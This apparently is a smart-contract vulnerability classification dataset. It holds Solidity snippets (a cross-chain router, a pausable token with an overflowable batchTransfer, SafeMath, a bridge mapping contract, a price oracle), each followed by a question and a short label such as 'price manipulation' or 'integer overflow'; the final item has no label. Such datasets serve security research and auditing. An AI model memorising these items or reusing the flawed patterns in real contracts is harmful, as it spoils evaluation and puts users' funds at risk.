368     function anySwapOutExactTokensForTokensUnderlyingWithPermit(
369         address from,
370         uint amountIn,
371         uint amountOutMin,
372         address[] calldata path,
373         address to,
374         uint deadline,
375         uint8 v,
376         bytes32 r,
377         bytes32 s,
378         uint toChainID
379     ) external virtual ensure(deadline) {
380         address _underlying = AnyswapV1ERC20(path[0]).underlying();
381         IERC20(_underlying).permit(from, address(this), amountIn, deadline, v, r, s);
382         TransferHelper.safeTransferFrom(_underlying, from, path[0], amountIn);
383         AnyswapV1ERC20(path[0]).depositVault(amountIn, from);
384         AnyswapV1ERC20(path[0]).burn(from, amountIn);
385         {
386         address[] memory _path = path;
387         address _from = from;
388         address _to = to;
389         uint _amountIn = amountIn;
390         uint _amountOutMin = amountOutMin;
391         uint _cID = cID();
392         uint _toChainID = toChainID;
393         emit LogAnySwapTradeTokensForTokens(_path, _from, _to, _amountIn, _amountOutMin, _cID, _toChainID);
394         }
395     }
396 
397     // sets up a cross-chain trade from this chain to `toChainID` for `path` trades to `to`
398     function anySwapOutExactTokensForTokensUnderlyingWithTransferPermit(
399         address from,
400         uint amountIn,
401         uint amountOutMin,
402         address[] calldata path,
403         address to,
404         uint deadline,
405         uint8 v,
406         bytes32 r,
407         bytes32 s,
408         uint toChainID
409     ) external virtual ensure(deadline) {
410         IERC20(AnyswapV1ERC20(path[0]).underlying()).transferWithPermit(from, path[0], amountIn, deadline, v, r, s);
411         AnyswapV1ERC20(path[0]).depositVault(amountIn, from);
412         AnyswapV1ERC20(path[0]).burn(from, amountIn);
413         emit LogAnySwapTradeTokensForTokens(path, from, to, amountIn, amountOutMin, cID(), toChainID);
414     }
415 
416     // Swaps `amounts[path.length-1]` `path[path.length-1]` to `to` on this chain
417     // Triggered by `anySwapOutExactTokensForTokens`
418     function anySwapInExactTokensForTokens(
419         bytes32 txs,
420         uint amountIn,
421         uint amountOutMin,
422         address[] calldata path,
423         address to,
424         uint deadline,
425         uint fromChainID
426     ) external onlyMPC virtual ensure(deadline) returns (uint[] memory amounts) {
427         amounts = SushiswapV2Library.getAmountsOut(factory, amountIn, path);
428         require(amounts[amounts.length - 1] >= amountOutMin, 'SushiswapV2Router: INSUFFICIENT_OUTPUT_AMOUNT');
429         _anySwapIn(txs, path[0], SushiswapV2Library.pairFor(factory, path[0], path[1]), amounts[0], fromChainID);
430         _swap(amounts, path, to);
431     }
432 
433     // sets up a cross-chain trade from this chain to `toChainID` for `path` trades to `to`
434     function anySwapOutExactTokensForNative(
435         uint amountIn,
436         uint amountOutMin,
437         address[] calldata path,
438         address to,
439         uint deadline,
440         uint toChainID
441     ) external virtual ensure(deadline) {
442         AnyswapV1ERC20(path[0]).burn(msg.sender, amountIn);
443         emit LogAnySwapTradeTokensForNative(path, msg.sender, to, amountIn, amountOutMin, cID(), toChainID);
444     }
445 
446     // sets up a cross-chain trade from this chain to `toChainID` for `path` trades to `to`
447     function anySwapOutExactTokensForNativeUnderlying(
448         uint amountIn,
449         uint amountOutMin,
450         address[] calldata path,
451         address to,
452         uint deadline,
453         uint toChainID
454     ) external virtual ensure(deadline) {
455         TransferHelper.safeTransferFrom(AnyswapV1ERC20(path[0]).underlying(), msg.sender, path[0], amountIn);
456         AnyswapV1ERC20(path[0]).depositVault(amountIn, msg.sender);
457         AnyswapV1ERC20(path[0]).burn(msg.sender, amountIn);
458         emit LogAnySwapTradeTokensForNative(path, msg.sender, to, amountIn, amountOutMin, cID(), toChainID);
459     }
460 
461     // sets up a cross-chain trade from this chain to `toChainID` for `path` trades to `to`
462     function anySwapOutExactTokensForNativeUnderlyingWithPermit(
463         address from,
464         uint amountIn,
465         uint amountOutMin,
466         address[] calldata path,
467         address to,
468         uint deadline,
469         uint8 v,
470         bytes32 r,
471         bytes32 s,
472         uint toChainID
473     ) external virtual ensure(deadline) {
474         address _underlying = AnyswapV1ERC20(path[0]).underlying();
475         IERC20(_underlying).permit(from, address(this), amountIn, deadline, v, r, s);
476         TransferHelper.safeTransferFrom(_underlying, from, path[0], amountIn);
477         AnyswapV1ERC20(path[0]).depositVault(amountIn, from);
478         AnyswapV1ERC20(path[0]).burn(from, amountIn);
479         {
480         address[] memory _path = path;
481         address _from = from;
482         address _to = to;
483         uint _amountIn = amountIn;
484         uint _amountOutMin = amountOutMin;
485         uint _cID = cID();
486         uint _toChainID = toChainID;
487         emit LogAnySwapTradeTokensForNative(_path, _from, _to, _amountIn, _amountOutMin, _cID, _toChainID);
488         }
489     }
490 
491     // sets up a cross-chain trade from this chain to `toChainID` for `path` trades to `to`
492     function anySwapOutExactTokensForNativeUnderlyingWithTransferPermit(
493         address from,
494         uint amountIn,
495         uint amountOutMin,
496         address[] calldata path,
497         address to,
498         uint deadline,
499         uint8 v,
500         bytes32 r,
501         bytes32 s,
502         uint toChainID
503     ) external virtual ensure(deadline) {
504         IERC20(AnyswapV1ERC20(path[0]).underlying()).transferWithPermit(from, path[0], amountIn, deadline, v, r, s);
505         AnyswapV1ERC20(path[0]).depositVault(amountIn, from);
506         AnyswapV1ERC20(path[0]).burn(from, amountIn);
507         emit LogAnySwapTradeTokensForNative(path, from, to, amountIn, amountOutMin, cID(), toChainID);
508     }
509 
510     // Swaps `amounts[path.length-1]` `path[path.length-1]` to `to` on this chain
511     // Triggered by `anySwapOutExactTokensForNative`
512     function anySwapInExactTokensForNative(
513         bytes32 txs,
514         uint amountIn,
515         uint amountOutMin,
516         address[] calldata path,
517         address to,
518         uint deadline,
519         uint fromChainID
520     ) external onlyMPC virtual ensure(deadline) returns (uint[] memory amounts) {
521         require(path[path.length - 1] == wNATIVE, 'AnyswapV3Router: INVALID_PATH');
522         amounts = SushiswapV2Library.getAmountsOut(factory, amountIn, path);
523         require(amounts[amounts.length - 1] >= amountOutMin, 'AnyswapV3Router: INSUFFICIENT_OUTPUT_AMOUNT');
524         _anySwapIn(txs, path[0],  SushiswapV2Library.pairFor(factory, path[0], path[1]), amounts[0], fromChainID);
525         _swap(amounts, path, address(this));
526         IwNATIVE(wNATIVE).withdraw(amounts[amounts.length - 1]);
527         TransferHelper.safeTransferNative(to, amounts[amounts.length - 1]);
528     }
529 
530     // **** LIBRARY FUNCTIONS ****
531     function quote(uint amountA, uint reserveA, uint reserveB) public pure virtual returns (uint amountB) {
532         return SushiswapV2Library.quote(amountA, reserveA, reserveB);
533     }
534 
535     function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut)
536         public
537         pure
538         virtual
539         returns (uint amountOut)
540     {
541         return SushiswapV2Library.getAmountOut(amountIn, reserveIn, reserveOut);
542     }
543 
544     function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut)
545         public
546         pure
547         virtual
548         returns (uint amountIn)
549     {
550         return SushiswapV2Library.getAmountIn(amountOut, reserveIn, reserveOut);
551     }
552 
553     function getAmountsOut(uint amountIn, address[] memory path)
554         public
555         view
556         virtual
557         returns (uint[] memory amounts)
558     {
559         return SushiswapV2Library.getAmountsOut(factory, amountIn, path);
560     }
561 
562     function getAmountsIn(uint amountOut, address[] memory path)
563         public
564         view
565         virtual
566         returns (uint[] memory amounts)
567     {
568         return SushiswapV2Library.getAmountsIn(factory, amountOut, path);
569     }
570 }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
1 contract PausableToken is StandardToken, Pausable {
2 
3   function transfer(address _to, uint256 _value) public whenNotPaused returns (bool) {
4     return super.transfer(_to, _value);
5   }
6 
7   function transferFrom(address _from, address _to, uint256 _value) public whenNotPaused returns (bool) {
8     return super.transferFrom(_from, _to, _value);
9   }
10 
11   function approve(address _spender, uint256 _value) public whenNotPaused returns (bool) {
12     return super.approve(_spender, _value);
13   }
14   
15   function batchTransfer(address[] _receivers, uint256 _value) public whenNotPaused returns (bool) {
16     uint cnt = _receivers.length;
17     uint256 amount = uint256(cnt) * _value;
18     require(cnt > 0 && cnt <= 20);
19     require(_value > 0 && balances[msg.sender] >= amount);
20 
21     balances[msg.sender] = balances[msg.sender].sub(amount);
22     for (uint i = 0; i < cnt; i++) {
23         balances[_receivers[i]] = balances[_receivers[i]].add(_value);
24         Transfer(msg.sender, _receivers[i], _value);
25     }
26     return true;
27   }
28 }
What are the vulnerabilities in the contract?
integer overflow
<end of text>
1 library SafeMath {
2   function mul(uint256 a, uint256 b) internal constant returns (uint256) {
3     uint256 c = a * b;
4     assert(a == 0 || c / a == b);
5     return c;
6   }
7 
8   function div(uint256 a, uint256 b) internal constant returns (uint256) {
9     // assert(b > 0); // Solidity automatically throws when dividing by 0
10     uint256 c = a / b;
11     // assert(a == b * c + a % b); // There is no case in which this doesn't hold
12     return c;
13   }
14 
15   function sub(uint256 a, uint256 b) internal constant returns (uint256) {
16     assert(b <= a);
17     return a - b;
18   }
19 
20   function add(uint256 a, uint256 b) internal constant returns (uint256) {
21     uint256 c = a + b;
22     assert(c >= a);
23     return c;
24   }
25 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 abstract contract MappingBase is ContextUpgradeSafe, Constants {
2         using SafeMath for uint;
3 
4     bytes32 public constant RECEIVE_TYPEHASH = keccak256("Receive(uint256 fromChainId,address to,uint256 nonce,uint256 volume,address signatory)");
5     bytes32 public constant DOMAIN_TYPEHASH = keccak256("EIP712Domain(string name,uint256 chainId,address verifyingContract)");
6     bytes32 internal _DOMAIN_SEPARATOR;
7     function DOMAIN_SEPARATOR() virtual public view returns (bytes32) {  return _DOMAIN_SEPARATOR;  }
8 
9     address public factory;
10     uint256 public mainChainId;
11     address public token;
12     address public deployer;
13     
14     mapping (address => uint) internal _authQuotas;                                     // signatory => quota
15     mapping (uint => mapping (address => uint)) public sentCount;                       // toChainId => to => sentCount
16     mapping (uint => mapping (address => mapping (uint => uint))) public sent;          // toChainId => to => nonce => volume
17     mapping (uint => mapping (address => mapping (uint => uint))) public received;      // fromChainId => to => nonce => volume
18     mapping (address => uint) public lasttimeUpdateQuotaOf;                             // signatory => lasttime
19     uint public autoQuotaRatio;
20     uint public autoQuotaPeriod;
21     
22     function setAutoQuota(uint ratio, uint period) virtual external onlyFactory {
23         autoQuotaRatio  = ratio;
24         autoQuotaPeriod = period;
25     }
26     
27     modifier onlyFactory {
28         require(msg.sender == factory, 'Only called by Factory');
29         _;
30     }
31     
32     modifier updateAutoQuota(address signatory) virtual {
33         uint quota = authQuotaOf(signatory);
34         if(_authQuotas[signatory] != quota) {
35             _authQuotas[signatory] = quota;
36             lasttimeUpdateQuotaOf[signatory] = now;
37         }
38         _;
39     }
40     
41     function authQuotaOf(address signatory) virtual public view returns (uint quota) {
42         quota = _authQuotas[signatory];
43         uint ratio  = autoQuotaRatio  != 0 ? autoQuotaRatio  : Factory(factory).getConfig(_autoQuotaRatio_);
44         uint period = autoQuotaPeriod != 0 ? autoQuotaPeriod : Factory(factory).getConfig(_autoQuotaPeriod_);
45         if(ratio == 0 || period == 0 || period == uint(-1))
46             return quota;
47         uint quotaCap = cap().mul(ratio).div(1e18);
48         uint delta = quotaCap.mul(now.sub(lasttimeUpdateQuotaOf[signatory])).div(period);
49         return Math.max(quota, Math.min(quotaCap, quota.add(delta)));
50     }
51     
52     function cap() public view virtual returns (uint);
53 
54     function increaseAuthQuotas(address[] memory signatories, uint[] memory increments) virtual external returns (uint[] memory quotas) {
55         require(signatories.length == increments.length, 'two array lenth not equal');
56         quotas = new uint[](signatories.length);
57         for(uint i=0; i<signatories.length; i++)
58             quotas[i] = increaseAuthQuota(signatories[i], increments[i]);
59     }
60     
61     function increaseAuthQuota(address signatory, uint increment) virtual public updateAutoQuota(signatory) onlyFactory returns (uint quota) {
62         quota = _authQuotas[signatory].add(increment);
63         _authQuotas[signatory] = quota;
64         emit IncreaseAuthQuota(signatory, increment, quota);
65     }
66     event IncreaseAuthQuota(address indexed signatory, uint increment, uint quota);
67     
68     function decreaseAuthQuotas(address[] memory signatories, uint[] memory decrements) virtual external returns (uint[] memory quotas) {
69         require(signatories.length == decrements.length, 'two array lenth not equal');
70         quotas = new uint[](signatories.length);
71         for(uint i=0; i<signatories.length; i++)
72             quotas[i] = decreaseAuthQuota(signatories[i], decrements[i]);
73     }
74     
75     function decreaseAuthQuota(address signatory, uint decrement) virtual public onlyFactory returns (uint quota) {
76         quota = authQuotaOf(signatory);
77         if(quota < decrement)
78             decrement = quota;
79         return _decreaseAuthQuota(signatory, decrement);
80     }
81     
82     function _decreaseAuthQuota(address signatory, uint decrement) virtual internal updateAutoQuota(signatory) returns (uint quota) {
83         quota = _authQuotas[signatory].sub(decrement);
84         _authQuotas[signatory] = quota;
85         emit DecreaseAuthQuota(signatory, decrement, quota);
86     }
87     event DecreaseAuthQuota(address indexed signatory, uint decrement, uint quota);
88     
89 
90     function needApprove() virtual public pure returns (bool);
91     
92     function send(uint toChainId, address to, uint volume) virtual external payable returns (uint nonce) {
93         return sendFrom(_msgSender(), toChainId, to, volume);
94     }
95     
96     function sendFrom(address from, uint toChainId, address to, uint volume) virtual public payable returns (uint nonce) {
97         _chargeFee();
98         _sendFrom(from, volume);
99         nonce = sentCount[toChainId][to]++;
100         sent[toChainId][to][nonce] = volume;
101         emit Send(from, toChainId, to, nonce, volume);
102     }
103     event Send(address indexed from, uint indexed toChainId, address indexed to, uint nonce, uint volume);
104     
105     function _sendFrom(address from, uint volume) virtual internal;
106 
107     function receive(uint256 fromChainId, address to, uint256 nonce, uint256 volume, Signature[] memory signatures) virtual external payable {
108         _chargeFee();
109         require(received[fromChainId][to][nonce] == 0, 'withdrawn already');
110         uint N = signatures.length;
111         require(N >= Factory(factory).getConfig(_minSignatures_), 'too few signatures');
112         for(uint i=0; i<N; i++) {
113             for(uint j=0; j<i; j++)
114                 require(signatures[i].signatory != signatures[j].signatory, 'repetitive signatory');
115             bytes32 structHash = keccak256(abi.encode(RECEIVE_TYPEHASH, fromChainId, to, nonce, volume, signatures[i].signatory));
116             bytes32 digest = keccak256(abi.encodePacked("\x19\x01", _DOMAIN_SEPARATOR, structHash));
117             address signatory = ecrecover(digest, signatures[i].v, signatures[i].r, signatures[i].s);
118             require(signatory != address(0), "invalid signature");
119             require(signatory == signatures[i].signatory, "unauthorized");
120             _decreaseAuthQuota(signatures[i].signatory, volume);
121             emit Authorize(fromChainId, to, nonce, volume, signatory);
122         }
123         received[fromChainId][to][nonce] = volume;
124         _receive(to, volume);
125         emit Receive(fromChainId, to, nonce, volume);
126     }
127     event Receive(uint256 indexed fromChainId, address indexed to, uint256 indexed nonce, uint256 volume);
128     event Authorize(uint256 fromChainId, address indexed to, uint256 indexed nonce, uint256 volume, address indexed signatory);
129     
130     function _receive(address to, uint256 volume) virtual internal;
131     
132     function _chargeFee() virtual internal {
133         require(msg.value >= Math.min(Factory(factory).getConfig(_fee_), 0.1 ether), 'fee is too low');
134         address payable feeTo = address(Factory(factory).getConfig(_feeTo_));
135         if(feeTo == address(0))
136             feeTo = address(uint160(factory));
137         feeTo.transfer(msg.value);
138         emit ChargeFee(_msgSender(), feeTo, msg.value);
139     }
140     event ChargeFee(address indexed from, address indexed to, uint value);
141 
142     uint256[47] private __gap;
143 }    
What are the vulnerabilities in the contract?
privilege escalation
cross bridge
<end of text>
1     function getYvTokenPrice(address token) internal view returns (uint256) {
2         YvTokenInfo memory yvTokenInfo = yvTokens[token];
3         require(yvTokenInfo.isYvToken, "not a Yvault token");
4  
5         uint256 pricePerShare;
6         address underlying;
7         if (yvTokenInfo.version == YvTokenVersion.V1) {
8             pricePerShare = YVaultV1Interface(token).getPricePerFullShare();
9             underlying = YVaultV1Interface(token).token();
10         } else {
11             pricePerShare = YVaultV2Interface(token).pricePerShare();
12             underlying = YVaultV2Interface(token).token();
13         }
14  
15         uint256 underlyingPrice;
16         if (crvTokens[underlying].isCrvToken) {
17             underlyingPrice = getCrvTokenPrice(underlying);
18         } else {
19             underlyingPrice = getTokenPrice(underlying);
20         }
21         return mul_(underlyingPrice, Exp({mantissa: pricePerShare}));
22     }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
1 pragma solidity ^0.5.16;
2 pragma experimental ABIEncoderV2;
3 
4 import "./Denominations.sol";
5 import "./PriceOracle.sol";
6 import "./interfaces/CurveTokenInterface.sol";
7 import "./interfaces/FeedRegistryInterface.sol";
8 import "./interfaces/UniswapV2Interface.sol";
9 import "./interfaces/V1PriceOracleInterface.sol";
10 import "./interfaces/XSushiExchangeRateInterface.sol";
11 import "./interfaces/YVaultTokenInterface.sol";
12 import "../CErc20.sol";
13 import "../CToken.sol";
14 import "../Exponential.sol";
15 import "../EIP20Interface.sol";
16 
17 contract PriceOracleProxy is PriceOracle, Exponential, Denominations {
18     /// @notice Yvault token version, currently support v1 and v2
19     enum YvTokenVersion {
20         V1,
21         V2
22     }
23 
24     /// @notice Curve token version, currently support v1, v2 and v3
25     enum CurveTokenVersion {
26         V1,
27         V2,
28         V3
29     }
30 
31     /// @notice Curve pool type, currently support ETH and USD base
32     enum CurvePoolType {
33         ETH,
34         USD
35     }
36 
37     struct YvTokenInfo {
38         /// @notice Check if this token is a Yvault token
39         bool isYvToken;
40         /// @notice The version of Yvault
41         YvTokenVersion version;
42     }
43 
44     struct CrvTokenInfo {
45         /// @notice Check if this token is a curve pool token
46         bool isCrvToken;
47         /// @notice The curve pool type
48         CurvePoolType poolType;
49         /// @notice The curve swap contract address
50         address curveSwap;
51     }
52 
53     struct AggregatorInfo {
54         /// @notice The base
55         address base;
56         /// @notice The quote denomination
57         address quote;
58         /// @notice It's being used or not
59         bool isUsed;
60     }
61 
62     /// @notice Admin address
63     address public admin;
64 
65     /// @notice Guardian address
66     address public guardian;
67 
68     /// @notice Indicator that this is a PriceOracle contract (for inspection)
69     bool public constant isPriceOracle = true;
70 
71     /// @notice The v1 price oracle, which will continue to serve prices for v1 assets
72     V1PriceOracleInterface public v1PriceOracle;
73 
74     /// @notice The ChainLink registry address
75     FeedRegistryInterface public registry;
76 
77     /// @notice ChainLink quotes
78     mapping(address => AggregatorInfo) public aggregators;
79 
80     /// @notice Check if the underlying address is Uniswap or SushiSwap LP
81     mapping(address => bool) public isUnderlyingLP;
82 
83     /// @notice Yvault token data
84     mapping(address => YvTokenInfo) public yvTokens;
85 
86     /// @notice Curve pool token data
87     mapping(address => CrvTokenInfo) public crvTokens;
88 
89     /// @notice BTC related addresses. All these underlying we use `Denominations.BTC` as the aggregator base.
90     address[6] public btcAddresses = [
91         0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599, // WBTC
92         0xEB4C2781e4ebA804CE9a9803C67d0893436bB27D, // renBTC
93         0x9BE89D2a4cd102D8Fecc6BF9dA793be995C22541, // BBTC
94         0x8dAEBADE922dF735c38C80C7eBD708Af50815fAa, // tBTC
95         0x0316EB71485b0Ab14103307bf65a021042c6d380, // HBTC
96         0xc4E15973E6fF2A35cC804c2CF9D2a1b817a8b40F // ibBTC
97     ];
98 
99     address public cEthAddress;
100 
101     address public constant usdcAddress = 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48;
102     address public constant wethAddress = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
103     address public constant sushiAddress = 0x6B3595068778DD592e39A122f4f5a5cF09C90fE2;
104     address public constant xSushiExRateAddress = 0x851a040fC0Dcbb13a272EBC272F2bC2Ce1e11C4d;
105     address public constant crXSushiAddress = 0x228619CCa194Fbe3Ebeb2f835eC1eA5080DaFbb2;
106 
107     /**
108      * @param admin_ The address of admin to set aggregators, LPs, curve tokens, or Yvault tokens
109      * @param v1PriceOracle_ The address of the v1 price oracle, which will continue to operate and hold prices for collateral assets
110      * @param cEthAddress_ The address of cETH, which will return a constant 1e18, since all prices relative to ether
111      * @param registry_ The address of ChainLink registry
112      */
113     constructor(
114         address admin_,
115         address v1PriceOracle_,
116         address cEthAddress_,
117         address registry_
118     ) public {
119         admin = admin_;
120         v1PriceOracle = V1PriceOracleInterface(v1PriceOracle_);
121         cEthAddress = cEthAddress_;
122         registry = FeedRegistryInterface(registry_);
123     }
124 
125     /**
126      * @notice Get the underlying price of a listed cToken asset
127      * @param cToken The cToken to get the underlying price of
128      * @return The underlying asset price mantissa (scaled by 1e18)
129      */
130     function getUnderlyingPrice(CToken cToken) public view returns (uint256) {
131         address cTokenAddress = address(cToken);
132         if (cTokenAddress == cEthAddress) {
133             // ether always worth 1
134             return 1e18;
135         } else if (cTokenAddress == crXSushiAddress) {
136             // Handle xSUSHI.
137             uint256 exchangeRate = XSushiExchangeRateInterface(xSushiExRateAddress).getExchangeRate();
138             return mul_(getTokenPrice(sushiAddress), Exp({mantissa: exchangeRate}));
139         }
140 
141         address underlying = CErc20(cTokenAddress).underlying();
142 
143         // Handle LP tokens.
144         if (isUnderlyingLP[underlying]) {
145             return getLPFairPrice(underlying);
146         }
147 
148         // Handle Yvault tokens.
149         if (yvTokens[underlying].isYvToken) {
150             return getYvTokenPrice(underlying);
151         }
152 
153         // Handle curve pool tokens.
154         if (crvTokens[underlying].isCrvToken) {
155             return getCrvTokenPrice(underlying);
156         }
157 
158         return getTokenPrice(underlying);
159     }
160 
161     /*** Internal fucntions ***/
162 
163     /**
164      * @notice Get the price of a specific token. Return 1e18 is it's WETH.
165      * @param token The token to get the price of
166      * @return The price
167      */
168     function getTokenPrice(address token) internal view returns (uint256) {
169         if (token == wethAddress) {
170             // weth always worth 1
171             return 1e18;
172         }
173 
174         AggregatorInfo memory aggregatorInfo = aggregators[token];
175         if (aggregatorInfo.isUsed) {
176             uint256 price = getPriceFromChainlink(aggregatorInfo.base, aggregatorInfo.quote);
177             if (aggregatorInfo.quote == Denominations.USD) {
178                 // Convert the price to ETH based if it's USD based.
179                 price = mul_(price, Exp({mantissa: getUsdcEthPrice()}));
180             }
181             uint256 underlyingDecimals = EIP20Interface(token).decimals();
182             return mul_(price, 10**(18 - underlyingDecimals));
183         }
184         return getPriceFromV1(token);
185     }
186 
187     /**
188      * @notice Get price from ChainLink
189      * @param base The base token that ChainLink aggregator gets the price of
190      * @param quote The quote token, currenlty support ETH and USD
191      * @return The price, scaled by 1e18
192      */
193     function getPriceFromChainlink(address base, address quote) internal view returns (uint256) {
194         (, int256 price, , , ) = registry.latestRoundData(base, quote);
195         require(price > 0, "invalid price");
196 
197         // Extend the decimals to 1e18.
198         return mul_(uint256(price), 10**(18 - uint256(registry.decimals(base, quote))));
199     }
200 
201     /**
202      * @notice Get the fair price of a LP. We use the mechanism from Alpha Finance.
203      *         Ref: https://blog.alphafinance.io/fair-lp-token-pricing/
204      * @param pair The pair of AMM (Uniswap or SushiSwap)
205      * @return The price
206      */
207     function getLPFairPrice(address pair) internal view returns (uint256) {
208         address token0 = IUniswapV2Pair(pair).token0();
209         address token1 = IUniswapV2Pair(pair).token1();
210         uint256 totalSupply = IUniswapV2Pair(pair).totalSupply();
211         (uint256 r0, uint256 r1, ) = IUniswapV2Pair(pair).getReserves();
212         uint256 sqrtR = sqrt(mul_(r0, r1));
213         uint256 p0 = getTokenPrice(token0);
214         uint256 p1 = getTokenPrice(token1);
215         uint256 sqrtP = sqrt(mul_(p0, p1));
216         return div_(mul_(2, mul_(sqrtR, sqrtP)), totalSupply);
217     }
218 
219     /**
220      * @notice Get price for Yvault tokens
221      * @param token The Yvault token
222      * @return The price
223      */
224     function getYvTokenPrice(address token) internal view returns (uint256) {
225         YvTokenInfo memory yvTokenInfo = yvTokens[token];
226         require(yvTokenInfo.isYvToken, "not a Yvault token");
227 
228         uint256 pricePerShare;
229         address underlying;
230         if (yvTokenInfo.version == YvTokenVersion.V1) {
231             pricePerShare = YVaultV1Interface(token).getPricePerFullShare();
232             underlying = YVaultV1Interface(token).token();
233         } else {
234             pricePerShare = YVaultV2Interface(token).pricePerShare();
235             underlying = YVaultV2Interface(token).token();
236         }
237 
238         uint256 underlyingPrice;
239         if (crvTokens[underlying].isCrvToken) {
240             underlyingPrice = getCrvTokenPrice(underlying);
241         } else {
242             underlyingPrice = getTokenPrice(underlying);
243         }
244         return mul_(underlyingPrice, Exp({mantissa: pricePerShare}));
245     }
246 
247     /**
248      * @notice Get price for curve pool tokens
249      * @param token The curve pool token
250      * @return The price
251      */
252     function getCrvTokenPrice(address token) internal view returns (uint256) {
253         CrvTokenInfo memory crvTokenInfo = crvTokens[token];
254         require(crvTokenInfo.isCrvToken, "not a curve pool token");
255 
256         uint256 virtualPrice = CurveSwapInterface(crvTokenInfo.curveSwap).get_virtual_price();
257         if (crvTokenInfo.poolType == CurvePoolType.ETH) {
258             return virtualPrice;
259         }
260 
261         // We treat USDC as USD and convert the price to ETH base.
262         return mul_(getUsdcEthPrice(), Exp({mantissa: virtualPrice}));
263     }
264 
265     /**
266      * @notice Get USDC price
267      * @dev We treat USDC as USD for convenience
268      * @return The USDC price
269      */
270     function getUsdcEthPrice() internal view returns (uint256) {
271         return getTokenPrice(usdcAddress) / 1e12;
272     }
273 
274     /**
275      * @notice Get price from v1 price oracle
276      * @param token The token to get the price of
277      * @return The price
278      */
279     function getPriceFromV1(address token) internal view returns (uint256) {
280         return v1PriceOracle.assetPrices(token);
281     }
282 
283     /**
284      * @notice Compare two strings are the same or not
285      * @param a The first string
286      * @param b The second string
287      * @return The same or not
288      */
289     function compareStrings(string memory a, string memory b) internal pure returns (bool) {
290         return (keccak256(abi.encodePacked((a))) == keccak256(abi.encodePacked((b))));
291     }
292 
293     /**
294      * @notice Check if the token is one of BTC relared address
295      * @param token The token address
296      * @return It's BTC or not
297      */
298     function isBtcAddress(address token) internal returns (bool) {
299         for (uint256 i = 0; i < btcAddresses.length; i++) {
300             if (btcAddresses[i] == token) {
301                 return true;
302             }
303         }
304         return false;
305     }
306 
307     /*** Admin or guardian functions ***/
308 
309     event AggregatorUpdated(address tokenAddress, address base, address quote, bool isUsed);
310     event IsLPUpdated(address tokenAddress, bool isLP);
311     event SetYVaultToken(address token, YvTokenVersion version);
312     event SetCurveToken(address token, CurvePoolType poolType, address swap);
313     event SetGuardian(address guardian);
314     event SetAdmin(address admin);
315 
316     /**
317      * @notice Set ChainLink aggregators for multiple tokens
318      * @param tokenAddresses The list of underlying tokens
319      * @param quotes The list of ChainLink aggregator quotes, currently support 'ETH' and 'USD'
320      */
321     function _setAggregators(address[] calldata tokenAddresses, string[] calldata quotes) external {
322         require(msg.sender == admin || msg.sender == guardian, "only the admin or guardian may set the aggregators");
323         require(tokenAddresses.length == quotes.length, "mismatched data");
324         for (uint256 i = 0; i < tokenAddresses.length; i++) {
325             address base;
326             address quote;
327             bool isUsed;
328             if (bytes(quotes[i]).length != 0) {
329                 require(msg.sender == admin, "guardian may only clear the aggregator");
330                 isUsed = true;
331 
332                 base = tokenAddresses[i];
333                 if (isBtcAddress(tokenAddresses[i])) {
334                     base = Denominations.BTC;
335                 }
336 
337                 if (compareStrings(quotes[i], "ETH")) {
338                     quote = Denominations.ETH;
339                 } else if (compareStrings(quotes[i], "USD")) {
340                     quote = Denominations.USD;
341                 } else {
342                     revert("unsupported denomination");
343                 }
344 
345                 // Make sure the aggregator exists.
346                 address aggregator = registry.getFeed(base, quote);
347                 require(registry.isFeedEnabled(aggregator), "aggregator not enabled");
348             }
349             aggregators[tokenAddresses[i]] = AggregatorInfo({base: base, quote: quote, isUsed: isUsed});
350             emit AggregatorUpdated(tokenAddresses[i], base, quote, isUsed);
351         }
352     }
353 
354     /**
355      * @notice See assets as LP tokens for multiple tokens
356      * @param tokenAddresses The list of tokens
357      * @param isLP The list of cToken properties (it's LP or not)
358      */
359     function _setLPs(address[] calldata tokenAddresses, bool[] calldata isLP) external {
360         require(msg.sender == admin, "only the admin may set LPs");
361         require(tokenAddresses.length == isLP.length, "mismatched data");
362         for (uint256 i = 0; i < tokenAddresses.length; i++) {
363             isUnderlyingLP[tokenAddresses[i]] = isLP[i];
364             if (isLP[i]) {
365                 // Sanity check to make sure the token is LP.
366                 IUniswapV2Pair(tokenAddresses[i]).token0();
367                 IUniswapV2Pair(tokenAddresses[i]).token1();
368             }
369             emit IsLPUpdated(tokenAddresses[i], isLP[i]);
370         }
371     }
372 
373     /**
374      * @notice See assets as Yvault tokens for multiple tokens
375      * @param tokenAddresses The list of tokens
376      * @param version The list of vault version
377      */
378     function _setYVaultTokens(address[] calldata tokenAddresses, YvTokenVersion[] calldata version) external {
379         require(msg.sender == admin, "only the admin may set Yvault tokens");
380         require(tokenAddresses.length == version.length, "mismatched data");
381         for (uint256 i = 0; i < tokenAddresses.length; i++) {
382             // Sanity check to make sure version is right.
383             if (version[i] == YvTokenVersion.V1) {
384                 YVaultV1Interface(tokenAddresses[i]).getPricePerFullShare();
385             } else {
386                 YVaultV2Interface(tokenAddresses[i]).pricePerShare();
387             }
388 
389             yvTokens[tokenAddresses[i]] = YvTokenInfo({isYvToken: true, version: version[i]});
390             emit SetYVaultToken(tokenAddresses[i], version[i]);
391         }
392     }
393 
394     /**
395      * @notice See assets as curve pool tokens for multiple tokens
396      * @param tokenAddresses The list of tokens
397      * @param poolType The list of curve pool type (ETH or USD base only)
398      * @param swap The list of curve swap address
399      */
400     function _setCurveTokens(
401         address[] calldata tokenAddresses,
402         CurveTokenVersion[] calldata version,
403         CurvePoolType[] calldata poolType,
404         address[] calldata swap
405     ) external {
406         require(msg.sender == admin, "only the admin may set curve pool tokens");
407         require(
408             tokenAddresses.length == version.length &&
409                 tokenAddresses.length == poolType.length &&
410                 tokenAddresses.length == swap.length,
411             "mismatched data"
412         );
413         for (uint256 i = 0; i < tokenAddresses.length; i++) {
414             if (version[i] == CurveTokenVersion.V3) {
415                 // Sanity check to make sure the token minter is right.
416                 require(CurveTokenV3Interface(tokenAddresses[i]).minter() == swap[i], "incorrect pool");
417             }
418 
419             crvTokens[tokenAddresses[i]] = CrvTokenInfo({isCrvToken: true, poolType: poolType[i], curveSwap: swap[i]});
420             emit SetCurveToken(tokenAddresses[i], poolType[i], swap[i]);
421         }
422     }
